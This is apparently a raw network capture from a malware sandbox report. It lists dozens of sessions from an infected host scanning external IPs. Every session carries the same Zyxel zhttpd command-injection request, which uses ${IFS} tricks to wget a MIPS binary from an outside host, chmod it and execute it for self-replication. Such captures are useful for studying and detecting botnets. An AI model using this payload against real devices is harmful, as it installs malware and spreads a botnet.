                                        Jan 14, 2024 16:18:33.186692953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1408192.168.2.1334374209.216.160.127443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186723948 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1409192.168.2.1343148170.126.166.96443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186774969 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1410192.168.2.1352736117.20.205.134443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186805964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1411192.168.2.135124688.12.89.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186860085 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1412192.168.2.1346900113.48.242.97443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186896086 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1413192.168.2.134574699.94.118.49443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186923027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1414192.168.2.13568065.236.76.53443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.186966896 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1415192.168.2.1350662206.192.181.67443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187011957 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1416192.168.2.135821859.3.109.68443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187055111 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1417192.168.2.1350496110.176.188.149443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187103033 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1418192.168.2.1352824118.178.132.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187146902 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1419192.168.2.134749246.78.57.190443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187187910 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1420192.168.2.1360526111.104.243.228443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187239885 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1421192.168.2.1342706111.101.211.240443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187268972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1422192.168.2.1344760155.87.69.128443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187328100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1423192.168.2.134314245.197.191.192443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.187380075 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1424192.168.2.134626494.95.160.25443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190458059 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1425192.168.2.1338842196.125.200.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190496922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1426192.168.2.134461643.157.48.76443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190532923 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1427192.168.2.135916417.168.252.162443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190566063 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1428192.168.2.133944070.45.199.168443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190598965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1429192.168.2.1353018118.216.246.209443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:33.190675020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1430192.168.2.135469089.142.87.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203264952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1431192.168.2.134843448.252.107.253443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203356981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1432192.168.2.134233084.29.245.137443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203396082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1433192.168.2.1336158151.248.98.226443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203449965 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1434192.168.2.1358926200.95.69.118443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203481913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1435192.168.2.134342287.229.244.232443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203557968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1436192.168.2.1339988216.96.34.182443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203644991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1437192.168.2.1357604160.138.156.104443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203701019 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1438192.168.2.136042220.149.236.223443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203749895 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1439192.168.2.135764618.107.218.114443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203780890 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1440192.168.2.135508649.143.128.117443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203835011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1441192.168.2.1353908158.128.81.248443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203882933 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1442192.168.2.1359930143.205.112.247443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.203931093 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1443192.168.2.1339920106.40.109.160443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204001904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1444192.168.2.1342236205.104.150.172443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204057932 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1445192.168.2.1354290190.181.68.115443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204123974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1446192.168.2.1357482195.240.14.176443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204184055 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1447192.168.2.1353160128.31.55.111443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204258919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1448192.168.2.1335834103.183.20.184443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204303980 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1449192.168.2.1347416105.48.249.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204355001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1450192.168.2.1345052158.243.214.13443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204412937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1451192.168.2.1332954133.227.218.229443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204446077 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1452192.168.2.1350532163.177.86.2443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204505920 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1453192.168.2.1333712205.116.163.152443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204547882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1454192.168.2.133806088.166.35.177443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204624891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1455192.168.2.1334708115.215.31.35443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204700947 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1456192.168.2.135189098.2.144.27443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204726934 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1457192.168.2.1334478158.43.44.207443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204765081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1458192.168.2.135471697.58.216.136443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204812050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1459192.168.2.1342186209.70.248.154443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204879045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1460192.168.2.1355848210.2.204.158443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.204906940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1461192.168.2.1352806217.23.39.197443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205008030 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1462192.168.2.1351782122.194.144.198443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205081940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1463192.168.2.1337588197.40.40.46443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205135107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1464192.168.2.1347644210.213.152.241443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205192089 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1465192.168.2.1358616164.47.242.45443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205254078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1466192.168.2.134392237.212.6.21443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205322027 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1467192.168.2.1334076149.190.218.42443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205388069 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1468192.168.2.135546012.68.87.113443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205456972 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1469192.168.2.1348768138.2.100.5443
                                        TimestampBytes transferredDirectionData
                                        Jan 14, 2024 16:18:34.205495119 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                        Session IDSource IPSource PortDestination IPDestination Port
                                        1470192.168.2.134707849.77.97.223443
                                        TimestampBytes transferredDirectionData
